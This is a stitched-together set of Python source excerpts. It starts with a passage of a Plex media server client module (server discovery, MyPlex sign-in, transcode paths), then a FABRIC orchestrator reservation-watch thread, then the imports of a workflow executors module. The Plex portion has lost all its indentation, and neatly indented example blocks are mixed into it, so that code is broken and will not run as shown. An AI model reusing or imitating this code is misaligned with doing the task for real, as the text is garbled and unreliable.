ip = CSettings.getSetting('ip_pms')
# resolve hostname if needed
try:
ip2 = socket.gethostbyname(ip)
if ip != ip2:
dprint(__name__, 0, "PlexAPI - Hostname "+ip+" resolved to "+ip2)
ip = ip2
except:
dprint(__name__, 0, "PlexAPI - ip_dns "+ip+" could not be resolved")
port = CSettings.getSetting('port_pms')
XML = getXMLFromPMS('http://'+ip+':'+port, '/servers', None, '')
if XML==False:
pass # no response from manual defined server (Settings.cfg)
else:
Server = XML.find('Server')
uuid = Server.get('machineIdentifier')
name = Server.get('name')
declarePMS(ATV_udid, uuid, name, 'http', ip, port) # dflt: token='', local, owned
# todo - check IP to verify "local"?
else:
# PlexGDM
PMS_list = PlexGDM()
for uuid in PMS_list:
PMS = PMS_list[uuid]
declarePMS(ATV_udid, PMS['uuid'], PMS['serverName'], 'http', PMS['ip'], PMS['port']) # dflt: token='', local, owned
else:
# MyPlex servers
getPMSListFromMyPlex(ATV_udid, authtoken)
# all servers - update enableGzip
for uuid in g_PMS.get(ATV_udid, {}):
# enable Gzip if not on same host, local&remote PMS depending on setting
enableGzip = (not getPMSProperty(ATV_udid, uuid, 'ip')==IP_self) and ( \
(getPMSProperty(ATV_udid, uuid, 'local')=='1' and CSettings.getSetting('allow_gzip_pmslocal')=='True' ) or \
(getPMSProperty(ATV_udid, uuid, 'local')=='0' and CSettings.getSetting('allow_gzip_pmsremote')=='True') )
updatePMSProperty(ATV_udid, uuid, 'enableGzip', enableGzip)
# debug print all servers
dprint(__name__, 0, "Plex Media Servers found: {0}", len(g_PMS[ATV_udid])-1)
for uuid in g_PMS[ATV_udid]:
dprint(__name__, 1, str(g_PMS[ATV_udid][uuid]))
"""
getPMSListFromMyPlex
get Plex media Server List from plex.tv/pms/resources
poke every PMS at every given address (plex.tv tends to cache a LOT...)
-> by design this leads to numerous threads ending in URLErrors like <timed out> or <Connection refused>
"""
def getPMSListFromMyPlex(ATV_udid, authtoken):
dprint(__name__, 0, "***")
dprint(__name__, 0, "poke plex.tv - request Plex Media Server list")
dprint(__name__, 0, "***")
XML = getXMLFromPMS('https://plex.tv', '/api/resources?includeHttps=1', {}, authtoken)
if XML==False:
pass # no data from MyPlex
else:
queue = Queue.Queue()
threads = []
PMSsPoked = 0
for Dir in XML.getiterator('Device'):
if Dir.get('product','') == "Plex Media Server" and Dir.get('provides','') == "server":
uuid = Dir.get('clientIdentifier')
name = Dir.get('name')
token = Dir.get('accessToken', authtoken)
owned = Dir.get('owned', '0')
if Dir.find('Connection') == None:
continue # no valid connection - skip
PMSsPoked +=1
# multiple connection possible - poke either one, fastest response wins
for Con in Dir.getiterator('Connection'):
protocol = Con.get('protocol')
ip = Con.get('address')
port = Con.get('port')
uri = Con.get('uri')
local = Con.get('local')
dprint(__name__, 0, "poke {0} ({1}) at {2}", name, uuid, uri)
# poke PMS, own thread for each poke
PMSInfo = { 'uuid': uuid, 'name': name, 'token': token, 'owned': owned, 'local': local, \
'protocol': protocol, 'ip': ip, 'port': port, 'uri': uri }
PMS = { 'baseURL': uri, 'path': '/', 'options': None, 'token': token, \
'data': PMSInfo }
t = Thread(target=getXMLFromPMSToQueue, args=(PMS, queue))
t.start()
threads.append(t)
# wait for requests being answered
# - either all communication threads done
# - or at least one response received from every PMS (early exit)
ThreadsAlive = -1
PMSsCnt = 0
while ThreadsAlive != 0 and PMSsPoked != PMSsCnt:
# check for "living" threads - basically a manual t.join()
ThreadsAlive = 0
for t in threads:
if t.isAlive():
ThreadsAlive += 1
# analyse PMS/http response - declare new PMS
if not queue.empty():
(PMSInfo, PMS) = queue.get()
if PMS==False:
# communication error - skip this connection
continue
uuid = PMSInfo['uuid']
name = PMSInfo['name']
if uuid != PMS.getroot().get('machineIdentifier') or \
name != PMS.getroot().get('friendlyName'):
# response from someone - but not the poked PMS - skip this connection
continue
token = PMSInfo['token']
owned = PMSInfo['owned']
local = PMSInfo['local']
protocol = PMSInfo['protocol']
ip = PMSInfo['ip']
port = PMSInfo['port']
uri = PMSInfo['uri']
if not uuid in g_PMS[ATV_udid]: # PMS uuid not yet handled, so take it
PMSsCnt += 1
dprint(__name__, 0, "response {0} ({1}) at {2}", name, uuid, uri)
declarePMS(ATV_udid, uuid, name, protocol, ip, port) # dflt: token='', local, owned - updated later
updatePMSProperty(ATV_udid, uuid, 'accesstoken', token)
updatePMSProperty(ATV_udid, uuid, 'owned', owned)
updatePMSProperty(ATV_udid, uuid, 'local', local)
updatePMSProperty(ATV_udid, uuid, 'baseURL', uri) # set in declarePMS, overwrite for https encryption
elif local=='1': # Update udid if local instance is found
dprint(__name__, 0, "update to {0} ({1}) at {2}", name, uuid, uri)
declarePMS(ATV_udid, uuid, name, protocol, ip, port) # dflt: token='', local, owned - updated later
updatePMSProperty(ATV_udid, uuid, 'accesstoken', token)
updatePMSProperty(ATV_udid, uuid, 'owned', owned)
updatePMSProperty(ATV_udid, uuid, 'local', local)
updatePMSProperty(ATV_udid, uuid, 'baseURL', uri) # set in declarePMS, overwrite for https encryption
"""
Plex Media Server communication
parameters:
host
path
options - dict() of PlexConnect-options as received from aTV, None for no std. X-Plex-Args
authtoken - authentication answer from MyPlex Sign In
result:
returned XML or 'False' in case of error
"""
def getXMLFromPMS(baseURL, path, options={}, authtoken='', enableGzip=False):
xargs = {}
if not options==None:
xargs = getXArgsDeviceInfo(options)
if not authtoken=='':
xargs['X-Plex-Token'] = authtoken
dprint(__name__, 1, "URL: {0}{1}", baseURL, path)
dprint(__name__, 1, "xargs: {0}", xargs)
request = urllib2.Request(baseURL+path , None, xargs)
request.add_header('User-agent', 'PlexConnect')
if enableGzip:
request.add_header('Accept-encoding', 'gzip')
try:
response = urllib2.urlopen(request, timeout=20)
except (urllib2.URLError, httplib.HTTPException) as e:
dprint(__name__, 1, 'No Response from Plex Media Server')
if hasattr(e, 'reason'):
dprint(__name__, 1, "We failed to reach a server. Reason: {0}", e.reason)
elif hasattr(e, 'code'):
dprint(__name__, 1, "The server couldn't fulfill the request. Error code: {0}", e.code)
dprint(__name__, 1, 'Traceback:\n{0}', traceback.format_exc())
return False
except IOError:
dprint(__name__, 0, 'Error loading response XML from Plex Media Server:\n{0}', traceback.format_exc())
return False
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO.StringIO(response.read())
file = gzip.GzipFile(fileobj=buf)
XML = etree.parse(file)
else:
# parse into etree
XML = etree.parse(response)
dprint(__name__, 1, "====== received PMS-XML ======")
dprint(__name__, 1, XML.getroot())
dprint(__name__, 1, "====== PMS-XML finished ======")
#XMLTree = etree.ElementTree(etree.fromstring(response))
return XML
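# --- Illustrative sketch (hedged) --------------------------------------------
# Example of calling getXMLFromPMS(); the base URL is a typical local PMS
# address and the empty token means an unauthenticated request. The function
# returns an ElementTree or False, so the result must be checked before use.
def _example_getXMLFromPMS_usage():
    XML = getXMLFromPMS('http://127.0.0.1:32400', '/library/sections', None, '')
    if XML == False:
        return None  # no response or parse error
    return XML.getroot().get('size', '0')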
def getXMLFromPMSToQueue(PMS, queue):
XML = getXMLFromPMS(PMS['baseURL'],PMS['path'],PMS['options'],PMS['token'])
queue.put( (PMS['data'], XML) )
def getXArgsDeviceInfo(options={}):
xargs = dict()
xargs['X-Plex-Device'] = 'AppleTV'
xargs['X-Plex-Model'] = '2,3' # Base it on AppleTV model.
#if not options is None:
if 'PlexConnectUDID' in options:
xargs['X-Plex-Client-Identifier'] = options['PlexConnectUDID'] # UDID for MyPlex device identification
if 'PlexConnectATVName' in options:
xargs['X-Plex-Device-Name'] = options['PlexConnectATVName'] # "friendly" name: aTV-Settings->General->Name.
xargs['X-Plex-Platform'] = 'iOS'
xargs['X-Plex-Client-Platform'] = 'iOS'
xargs['X-Plex-Client-Profile-Extra'] = 'add-transcode-target(type=MusicProfile&context=streaming&protocol=hls&container=mpegts&audioCodec=aac)+add-transcode-target(type=videoProfile&context=streaming&protocol=hls&container=mpegts&videoCodec=h264&audioCodec=aac,mp3&replace=true)'
if 'DolbyDigital' in options:
if options['DolbyDigital']:
xargs['X-Plex-Client-Profile-Extra'] = 'add-transcode-target(type=MusicProfile&context=streaming&protocol=hls&container=mpegts&audioCodec=aac)+add-transcode-target(type=videoProfile&context=streaming&protocol=hls&container=mpegts&videoCodec=h264&audioCodec=ac3&replace=true)+add-limitation(scope=videoAudioCodec&scopeName=ac3&type=upperBound&name=audio.channels&value=6&onlyTranscodes=true&replace=true)'
if 'aTVFirmwareVersion' in options:
xargs['X-Plex-Platform-Version'] = options['aTVFirmwareVersion']
xargs['X-Plex-Product'] = 'PlexConnect'
xargs['X-Plex-Version'] = __VERSION__
return xargs
"""
provide combined XML representation of local servers' XMLs, e.g. /library/section
parameters:
ATV_udid
path
type - owned <> shared (previously: local, myplex)
options
result:
XML
"""
def getXMLFromMultiplePMS(ATV_udid, path, type, options={}):
queue = Queue.Queue()
threads = []
root = etree.Element("MediaConverter")
root.set('friendlyName', type+' Servers')
for uuid in g_PMS.get(ATV_udid, {}):
if (type=='all' and getPMSProperty(ATV_udid, uuid, 'name')!='plex.tv') or \
(type=='owned' and getPMSProperty(ATV_udid, uuid, 'owned')=='1') or \
(type=='shared' and getPMSProperty(ATV_udid, uuid, 'owned')=='0') or \
(type=='local' and getPMSProperty(ATV_udid, uuid, 'local')=='1') or \
(type=='remote' and getPMSProperty(ATV_udid, uuid, 'local')=='0'):
Server = etree.SubElement(root, 'Server') # create "Server" node
Server.set('name', getPMSProperty(ATV_udid, uuid, 'name'))
Server.set('address', getPMSProperty(ATV_udid, uuid, 'ip'))
Server.set('port', getPMSProperty(ATV_udid, uuid, 'port'))
Server.set('baseURL', getPMSProperty(ATV_udid, uuid, 'baseURL'))
Server.set('local', getPMSProperty(ATV_udid, uuid, 'local'))
Server.set('owned', getPMSProperty(ATV_udid, uuid, 'owned'))
baseURL = getPMSProperty(ATV_udid, uuid, 'baseURL')
token = getPMSProperty(ATV_udid, uuid, 'accesstoken')
PMS_mark = 'PMS(' + getPMSProperty(ATV_udid, uuid, 'address') + ')'
Server.set('searchKey', PMS_mark + getURL('', '', '/Search/Entry.xml'))
# request XMLs, one thread for each
PMS = { 'baseURL':baseURL, 'path':path, 'options':options, 'token':token, \
'data': {'uuid': uuid, 'Server': Server} }
t = Thread(target=getXMLFromPMSToQueue, args=(PMS, queue))
t.start()
threads.append(t)
# wait for requests being answered
for t in threads:
t.join()
# add new data to root XML, individual Server
while not queue.empty():
(data, XML) = queue.get()
uuid = data['uuid']
Server = data['Server']
baseURL = getPMSProperty(ATV_udid, uuid, 'baseURL')
token = getPMSProperty(ATV_udid, uuid, 'accesstoken')
PMS_mark = 'PMS(' + getPMSProperty(ATV_udid, uuid, 'address') + ')'
if XML==False:
Server.set('size', '0')
else:
Server.set('size', XML.getroot().get('size', '0'))
for Dir in XML.getiterator('Directory'): # copy "Directory" content, add PMS to links
key = Dir.get('key') # absolute path
Dir.set('key', PMS_mark + getURL('', path, key))
Dir.set('refreshKey', getURL(baseURL, path, key) + '/refresh')
if 'thumb' in Dir.attrib:
Dir.set('thumb', PMS_mark + getURL('', path, Dir.get('thumb')))
if 'art' in Dir.attrib:
Dir.set('art', PMS_mark + getURL('', path, Dir.get('art')))
Server.append(Dir)
for Playlist in XML.getiterator('Playlist'): # copy "Playlist" content, add PMS to links
key = Playlist.get('key') # absolute path
Playlist.set('key', PMS_mark + getURL('', path, key))
if 'composite' in Playlist.attrib:
Playlist.set('composite', PMS_mark + getURL('', path, Playlist.get('composite')))
Server.append(Playlist)
for Video in XML.getiterator('Video'): # copy "Video" content, add PMS to links
key = Video.get('key') # absolute path
Video.set('key', PMS_mark + getURL('', path, key))
if 'thumb' in Video.attrib:
Video.set('thumb', PMS_mark + getURL('', path, Video.get('thumb')))
if 'parentKey' in Video.attrib:
Video.set('parentKey', PMS_mark + getURL('', path, Video.get('parentKey')))
if 'parentThumb' in Video.attrib:
Video.set('parentThumb', PMS_mark + getURL('', path, Video.get('parentThumb')))
if 'grandparentKey' in Video.attrib:
Video.set('grandparentKey', PMS_mark + getURL('', path, Video.get('grandparentKey')))
if 'grandparentThumb' in Video.attrib:
Video.set('grandparentThumb', PMS_mark + getURL('', path, Video.get('grandparentThumb')))
Server.append(Video)
root.set('size', str(len(root.findall('Server'))))
XML = etree.ElementTree(root)
dprint(__name__, 1, "====== Local Server/Sections XML ======")
dprint(__name__, 1, XML.getroot())
dprint(__name__, 1, "====== Local Server/Sections XML finished ======")
return XML # XML representation - created "just in time". Do we need to cache it?
def getURL(baseURL, path, key):
if key.startswith('http://') or key.startswith('https://'): # external server
URL = key
elif key.startswith('/'): # internal full path.
URL = baseURL + key
elif key == '': # internal path
URL = baseURL + path
else: # internal path, add-on
URL = baseURL + path + '/' + key
return URL
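# Worked examples of the getURL() join rules above (values are illustrative only):
#   getURL('http://pms:32400', '/library', 'http://other/abc')  -> 'http://other/abc'
#   getURL('http://pms:32400', '/library', '/library/sections') -> 'http://pms:32400/library/sections'
#   getURL('http://pms:32400', '/library', '')                  -> 'http://pms:32400/library'
#   getURL('http://pms:32400', '/library', 'sections')          -> 'http://pms:32400/library/sections'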
"""
MyPlex Sign In, Sign Out
parameters:
username - Plex forum name, MyPlex login, or email address
password
options - dict() of PlexConnect-options as received from aTV - necessary: PlexConnectUDID
result:
username
authtoken - token for subsequent communication with MyPlex
"""
def MyPlexSignIn(username, password, options):
# MyPlex web address
MyPlexHost = 'plex.tv'
MyPlexSignInPath = '/users/sign_in.xml'
MyPlexURL = 'https://' + MyPlexHost + MyPlexSignInPath
# create POST request
xargs = getXArgsDeviceInfo(options)
request = urllib2.Request(MyPlexURL, None, xargs)
request.get_method = lambda: 'POST' # turn into 'POST' - done automatically with data!=None. But we don't have data.
# no certificate, will fail with "401 - Authentication required"
"""
try:
f = urllib2.urlopen(request)
except urllib2.HTTPError, e:
print e.headers
print "has WWW_Authenticate:", e.headers.has_key('WWW-Authenticate')
print
"""
# provide credentials
### optional... when 'realm' is unknown
##passmanager = urllib2.HTTPPasswordMgrWithDefaultRealm()
##passmanager.add_password(None, address, username, password) # None: default "realm"
passmanager = urllib2.HTTPPasswordMgr()
passmanager.add_password(MyPlexHost, MyPlexURL, username, password) # realm = 'plex.tv'
authhandler = urllib2.HTTPBasicAuthHandler(passmanager)
urlopener = urllib2.build_opener(authhandler)
# sign in, get MyPlex response
try:
response = urlopener.open(request).read()
except urllib2.HTTPError, e:
if e.code==401:
dprint(__name__, 0, 'Authentication failed')
return ('', '')
else:
raise
dprint(__name__, 1, "====== MyPlex sign in XML ======")
dprint(__name__, 1, response)
dprint(__name__, 1, "====== MyPlex sign in XML finished ======")
# analyse response
XMLTree = etree.ElementTree(etree.fromstring(response))
el_username = XMLTree.find('username')
el_authtoken = XMLTree.find('authentication-token')
if el_username is None or \
el_authtoken is None:
username = ''
authtoken = ''
dprint(__name__, 0, 'MyPlex Sign In failed')
else:
username = el_username.text
authtoken = el_authtoken.text
dprint(__name__, 0, 'MyPlex Sign In successful')
return (username, authtoken)
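# --- Illustrative sketch (hedged) --------------------------------------------
# Example of a MyPlex sign-in round trip; the credentials and UDID are
# placeholders. An empty tuple ('', '') signals failed authentication.
def _example_MyPlexSignIn_usage():
    options = {'PlexConnectUDID': '0000-example'}
    (user, authtoken) = MyPlexSignIn('user@example.com', 'secret', options)
    if user == '' and authtoken == '':
        dprint(__name__, 0, "sign in failed")
    return (user, authtoken)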
def MyPlexSignOut(authtoken):
# MyPlex web address
MyPlexHost = 'plex.tv'
MyPlexSignOutPath = '/users/sign_out.xml'
MyPlexURL = 'http://' + MyPlexHost + MyPlexSignOutPath
# create POST request
xargs = { 'X-Plex-Token': authtoken }
request = urllib2.Request(MyPlexURL, None, xargs)
request.get_method = lambda: 'POST' # turn into 'POST' - done automatically with data!=None. But we don't have data.
response = urllib2.urlopen(request).read()
dprint(__name__, 1, "====== MyPlex sign out XML ======")
dprint(__name__, 1, response)
dprint(__name__, 1, "====== MyPlex sign out XML finished ======")
dprint(__name__, 0, 'MyPlex Sign Out done')
def MyPlexSwitchHomeUser(id, pin, options, authtoken):
MyPlexHost = 'https://plex.tv'
MyPlexURL = MyPlexHost + '/api/home/users/' + id + '/switch'
if pin:
MyPlexURL += '?pin=' + pin
xargs = {}
if options:
xargs = getXArgsDeviceInfo(options)
xargs['X-Plex-Token'] = authtoken
request = urllib2.Request(MyPlexURL, None, xargs)
request.get_method = lambda: 'POST' # turn into 'POST' - done automatically with data!=None. But we don't have data.
response = urllib2.urlopen(request).read()
dprint(__name__, 1, "====== MyPlexHomeUser XML ======")
dprint(__name__, 1, response)
dprint(__name__, 1, "====== MyPlexHomeUser XML finished ======")
# analyse response
XMLTree = etree.ElementTree(etree.fromstring(response))
el_user = XMLTree.getroot() # root=<user>. double check?
username = el_user.attrib.get('title', '')
authtoken = el_user.attrib.get('authenticationToken', '')
if username and authtoken:
dprint(__name__, 0, 'MyPlex switch HomeUser change successful')
else:
dprint(__name__, 0, 'MyPlex switch HomeUser change failed')
return (username, authtoken)
"""
Transcode Video support
parameters:
path
AuthToken
options - dict() of PlexConnect-options as received from aTV
action - transcoder action: Auto, Directplay, Transcode
quality - (resolution, quality, bitrate)
subtitle - {'selected', 'dontBurnIn', 'size'}
audio - {'boost'}
result:
final path to pull in PMS transcoder
"""
def getTranscodeVideoPath(path, AuthToken, options, action, quality, subtitle, audio, partIndex):
UDID = options['PlexConnectUDID']
transcodePath = '/video/:/transcode/universal/start.m3u8?'
vRes = quality[0]
vQ = quality[1]
mVB = quality[2]
dprint(__name__, 1, "Setting transcode quality Res:{0} Q:{1} {2}Mbps", vRes, vQ, mVB)
dprint(__name__, 1, "Subtitle: selected {0}, dontBurnIn {1}, size {2}", subtitle['selected'], subtitle['dontBurnIn'], subtitle['size'])
dprint(__name__, 1, "Audio: boost {0}", audio['boost'])
args = dict()
args['session'] = UDID
args['protocol'] = 'hls'
args['videoResolution'] = vRes
args['maxVideoBitrate'] = mVB
args['videoQuality'] = vQ
args['mediaBufferSize'] = '80000'
args['directStream'] = '0' if action=='Transcode' else '1'
# 'directPlay' - handled by the client in MEDIARUL()
args['subtitleSize'] = subtitle['size']
args['skipSubtitles'] = subtitle['dontBurnIn'] #'1' # shut off PMS subtitles. Todo: skip only for aTV native/SRT (or other supported)
args['audioBoost'] = audio['boost']
args['fastSeek'] = '1'
args['path'] = path
args['partIndex'] = partIndex
xargs = getXArgsDeviceInfo(options)
xargs['X-Plex-Client-Capabilities'] = "protocols=http-live-streaming,http-mp4-streaming,http-streaming-video,http-streaming-video-720p,http-mp4-video,http-mp4-video-720p;videoDecoders=h264{profile:high&resolution:1080&level:41};audioDecoders=mp3,aac{bitrate:160000}"
if not AuthToken=='':
xargs['X-Plex-Token'] = AuthToken
return transcodePath + urlencode(args) + '&' + urlencode(xargs)
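# --- Illustrative sketch (hedged) --------------------------------------------
# Example of building a transcode start path with the quality/subtitle/audio
# structures described above; all values are placeholders. The result is a
# relative path that still has to be prefixed with the PMS baseURL.
def _example_getTranscodeVideoPath_usage():
    options = {'PlexConnectUDID': '0000-example'}
    quality = ('1280x720', '75', '4')    # (resolution, quality, bitrate)
    subtitle = {'selected': '0', 'dontBurnIn': '1', 'size': '100'}
    audio = {'boost': '100'}
    return getTranscodeVideoPath('/library/metadata/1', '', options,
                                 'Transcode', quality, subtitle, audio, 0)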
"""
Direct Video Play support
parameters:
path
AuthToken
Indirect - media indirect specified, grab child XML to gain real path
options
result:
final path to media file
"""
def getDirectVideoPath(key, AuthToken):
if key.startswith('http://') or key.startswith('https://'): # external address - keep
path = key
else:
if AuthToken=='':
path = key
else:
xargs = dict()
xargs['X-Plex-Token'] = AuthToken
if key.find('?')==-1:
path = key + '?' + urlencode(xargs)
else:
path = key + '&' + urlencode(xargs)
return path
"""
Transcode Image support
parameters:
key
AuthToken
path - source path of current XML: path[srcXML]
width
height
result:
final path to image file
"""
def getTranscodeImagePath(key, AuthToken, path, width, height):
if key.startswith('http://') or key.startswith('https://'): # external address - can we get a transcoding request for external images?
path = key
elif key.startswith('/'): # internal full path.
path = 'http://127.0.0.1:32400' + key
else: # internal path, add-on
path = 'http://127.0.0.1:32400' + path + '/' + key
path = path.encode('utf8')
# This is bogus (note the extra path component) but ATV is stupid when it comes to caching images; it doesn't use query strings.
# Fortunately PMS is lenient...
transcodePath = '/photo/:/transcode/' +str(width)+'x'+str(height)+ '/' + quote_plus(path)
args = dict()
args['width'] = width
args['height'] = height
args['url'] = path
if not AuthToken=='':
args['X-Plex-Token'] = AuthToken
return transcodePath + '?' + urlencode(args)
"""
Direct Image support
parameters:
path
AuthToken
result:
final path to image file
"""
def getDirectImagePath(path, AuthToken):
if not AuthToken=='':
xargs = dict()
xargs['X-Plex-Token'] = AuthToken
if path.find('?')==-1:
path = path + '?' + urlencode(xargs)
else:
path = path + '&' + urlencode(xargs)
return path
"""
Transcode Audio support
parameters:
path
AuthToken
options - dict() of PlexConnect-options as received from aTV
maxAudioBitrate - [kbps]
result:
final path to pull in PMS transcoder
"""
def getTranscodeAudioPath(path, AuthToken, options, maxAudioBitrate):
UDID = options['PlexConnectUDID']
transcodePath = '/music/:/transcode/universal/start.mp3?'
args = dict()
args['path'] = path
args['session'] = UDID
args['protocol'] = 'hls'
args['maxAudioBitrate'] = maxAudioBitrate
xargs = getXArgsDeviceInfo(options)
if not AuthToken=='':
xargs['X-Plex-Token'] = AuthToken
return transcodePath + urlencode(args) + '&' + urlencode(xargs)
"""
Direct Audio support
parameters:
path
AuthToken
result:
final path to audio file
"""
def getDirectAudioPath(path, AuthToken):
if not AuthToken=='':
xargs = dict()
xargs['X-Plex-Token'] = AuthToken
if path.find('?')==-1:
path = path + '?' + urlencode(xargs)
else:
path = path + '&' + urlencode(xargs)
return path
if __name__ == '__main__':
testPlexGDM = 0
testLocalPMS = 0
testSectionXML = 1
testMyPlexXML = 0
testMyPlexSignIn = 0
testMyPlexSignOut = 0
username = 'abc'
password = 'def'
token = 'xyz'
# test PlexGDM
if testPlexGDM:
dprint('', 0, "*** PlexGDM")
PMS_list = PlexGDM()
dprint('', 0, PMS_list)
# test XML from local PMS
if testLocalPMS:
dprint('', 0, "*** XML from local PMS")
XML = getXMLFromPMS('http://127.0.0.1:32400', '/library/sections')
# test local Server/Sections
if testSectionXML:
dprint('', 0, "*** local Server/Sections")
PMS_list = PlexGDM()
XML = getSectionXML(PMS_list, {}, '')
# test XML from MyPlex
if testMyPlexXML:
dprint('', 0, "*** XML from MyPlex")
XML = getXMLFromPMS('https://plex.tv', '/pms/servers', None, token)
XML = getXMLFromPMS('https://plex.tv', '/pms/system/library/sections', None, token)
# test MyPlex Sign In
if testMyPlexSignIn:
dprint('', 0, "*** MyPlex Sign In")
options = {'PlexConnectUDID':'007'}
(user, token) = MyPlexSignIn(username, password, options)
if user=='' and token=='':
dprint('', 0, "Authentication failed")
else:
dprint('', 0, "logged in: {0}, {1}", user, token)
# test MyPlex Sign out
if testMyPlexSignOut:
dprint('', 0, "*** MyPlex Sign Out")
MyPlexSignOut(token)
dprint('', 0, "logged out")
# test transcoder
|
reservation_status_update_thread.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2020 FABRIC Testbed
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Author: Komal Thareja (kthare10@renci.org)
import queue
import threading
import traceback
from typing import List
from fabric_cf.actor.core.util.id import ID
from fabric_cf.actor.core.util.iterable_queue import IterableQueue
from fabric_cf.orchestrator.core.active_status_checker import ActiveStatusChecker
from fabric_cf.orchestrator.core.exceptions import OrchestratorException
from fabric_cf.orchestrator.core.i_status_update_callback import IStatusUpdateCallback
from fabric_cf.orchestrator.core.status_checker import StatusChecker, Status
from fabric_cf.orchestrator.core.watch_entry import WatchEntry
class ReservationStatusUpdateThread:
"""
This thread allows expressing interest in the completion of certain reservations and can run callbacks on other
specified reservations when their status changes accordingly.
The periodic thread polls the reservations of interest to determine whether they have reached the required state,
upon which the callback is invoked.
"""
MODIFY_CHECK_PERIOD = 5 # seconds
def __init__(self):
self.controller = None
self.thread_lock = threading.Lock()
self.reservation_lock = threading.Lock()
self.active_watch = queue.Queue()
self.stopped_worker = threading.Event()
from fabric_cf.actor.core.container.globals import GlobalsSingleton
self.logger = GlobalsSingleton.get().get_logger()
self.thread = None
self.stopped = False
def start(self):
"""
Start
:return:
"""
try:
self.thread_lock.acquire()
if self.thread is not None:
raise OrchestratorException("This ReservationStatusUpdateThread has already been started")
self.thread = threading.Thread(target=self.periodic)
self.thread.setName(self.__class__.__name__)
self.thread.setDaemon(True)
self.thread.start()
finally:
self.thread_lock.release()
def stop(self):
"""
Stop
:return:
"""
self.stopped = True
self.stopped_worker.set()
try:
self.thread_lock.acquire()
temp = self.thread
self.thread = None
if temp is not None:
self.logger.warning("It seems that the ReservationStatusUpdateThread is running. Interrupting it")
try:
temp.join()
except Exception as e:
self.logger.error("Could not join ReservationStatusUpdateThread thread {}".format(e))
finally:
self.thread_lock.release()
finally:
if self.thread_lock is not None and self.thread_lock.locked():
self.thread_lock.release()
def periodic(self):
"""
Periodic
:return:
"""
self.logger.debug("Reservation Status Update Thread started")
while not self.stopped_worker.wait(timeout=self.MODIFY_CHECK_PERIOD):
self.run()
self.logger.debug("Reservation Status Update Thread exited")
def __add_active_status_watch(self, *, we: WatchEntry):
try:
self.reservation_lock.acquire()
self.logger.debug(f"Added watch entry {we}")
self.active_watch.put_nowait(we)
finally:
self.reservation_lock.release()
def add_active_status_watch(self, *, watch: ID, callback: IStatusUpdateCallback):
"""
Watch for a transition to Active or Failed. The callback is called when the reservation has either Failed or become Active
@param watch - reservation to watch
@param callback - callback object
"""
if watch is None or callback is None:
self.logger.info(f"watch {watch} callback {callback}, ignoring")
return
self.__add_active_status_watch(we=WatchEntry(watch=watch, callback=callback))
def process_watch_list(self, *, watch_list: List[WatchEntry], watch_type: str, status_checker: StatusChecker):
"""
Process watch list
:param watch_list:
:param watch_type:
:param status_checker:
:return:
"""
to_remove = []
self.logger.debug(f"Scanning {watch_type} watch list {len(watch_list)}")
if self.controller is None:
from fabric_cf.orchestrator.core.orchestrator_kernel import OrchestratorKernelSingleton
self.controller = OrchestratorKernelSingleton.get().get_management_actor()
for watch_entry in watch_list:
status, reservation = status_checker.check(controller=self.controller, rid=watch_entry.reservation_to_watch)
self.logger.info(f"Status------- {status} for {reservation.get_reservation_id()}")
if status == Status.OK:
to_remove.append(watch_entry)
watch_entry.callback.success(controller=self.controller, reservation=reservation)
elif status == Status.NOT_OK:
to_remove.append(watch_entry)
watch_entry.callback.failure(controller=self.controller, reservation=reservation)
self.logger.debug(f"Removing {watch_type} entries from watch {len(to_remove)}")
for we in to_remove:
watch_list.remove(we)
# Add the Not Ready entries back
for we in watch_list:
self.__add_active_status_watch(we=we)
def run(self):
# wake up periodically and check the status of reservations (state or unit modify properties)
# and call appropriate callbacks if necessary.
# scan both lists and check if any of the
# reservation groups on them are ready for callbacks
# remove those ready for callbacks off the lists and invoke callbacks
# outside the critical section
# NOTE: because callback can create another callback, which can add watches,
# we must make this code re-entrant hence the need to change the watch list
# and only then call the callbacks
try:
active_watch_list = []
try:
self.reservation_lock.acquire()
if not self.active_watch.empty():
for a in IterableQueue(source_queue=self.active_watch):
active_watch_list.append(a)
finally:
self.reservation_lock.release()
self.process_watch_list(watch_list=active_watch_list, watch_type="active",
status_checker=ActiveStatusChecker())
except Exception as e:
self.logger.error(f"RuntimeException: {e} continuing")
self.logger.error(traceback.format_exc())
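# --- Illustrative sketch (hedged, not part of the orchestrator) --------------
# Example of driving this thread: register a reservation of interest together
# with a callback object. The callback below only mirrors the two methods the
# thread invokes (success/failure with controller and reservation keyword
# arguments); a real implementation would derive from IStatusUpdateCallback.
# The reservation id is a placeholder supplied by the caller.
class _ExampleCallback:
    def success(self, *, controller, reservation):
        print(f"reservation {reservation.get_reservation_id()} became Active")

    def failure(self, *, controller, reservation):
        print(f"reservation {reservation.get_reservation_id()} Failed")


def _example_watch_registration(updater: ReservationStatusUpdateThread, rid: ID):
    updater.start()
    updater.add_active_status_watch(watch=rid, callback=_ExampleCallback())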
|
executors.py
|
# -*- coding: utf-8 -*-
""" Single and multi-threaded executors."""
import datetime
import os
import tempfile
import threading
from abc import ABCMeta, abstractmethod
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union
import psutil
from six import string_types, with_metaclass
from typing_extensions import Text # pylint: disable=unused-import
from schema_salad.validate import ValidationException
from .builder import Builder # pylint: disable=unused-import
from .context import (RuntimeContext, # pylint: disable=unused-import
getdefault)
from .errors import WorkflowException
from .job import JobBase # pylint: disable=unused-import
from .loghandler import _logger
from .mutation import MutationManager
from .process import Process # pylint: disable=unused-import
from .process import cleanIntermediate, relocateOutputs
from .provenance import ProvenanceProfile
from .utils import DEFAULT_TMP_PREFIX
